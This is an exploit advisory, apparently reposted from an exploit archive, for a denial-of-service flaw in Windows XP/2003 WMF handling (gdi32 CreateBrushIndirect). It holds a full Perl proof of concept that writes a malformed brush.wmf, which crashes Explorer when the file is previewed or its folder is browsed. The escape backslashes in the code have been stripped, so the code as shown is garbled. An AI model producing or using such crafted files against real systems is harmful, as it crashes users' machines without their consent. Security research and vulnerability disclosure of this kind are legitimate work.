Description:
yet another 'windows meta file' (WMF) denial of service exploit.
System affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003
Tech info:
page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.
Exploit:
=== begin of brush.pl ===
#!/usr/bin/perl
print "nWMF PoC denial of service exploit by cyanid-E <[email protected]>";
print "nngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf filen";
print WMF "x01x00x09x00x00x03x22x00x00x00x63x79x61x6Ex69x64";
print WMF "x2Dx45x07x00x00x00xFCx02x00x00x00x00x00x00x00x00";
print WMF "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00";
print WMF "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00";
print WMF "x00x00x00x00";
close(WMF);
print "oknnnow try to browse folder in XP explorer and wait :)n";
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).
Discovered:
06/24/2006; vendor informed but not answered
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum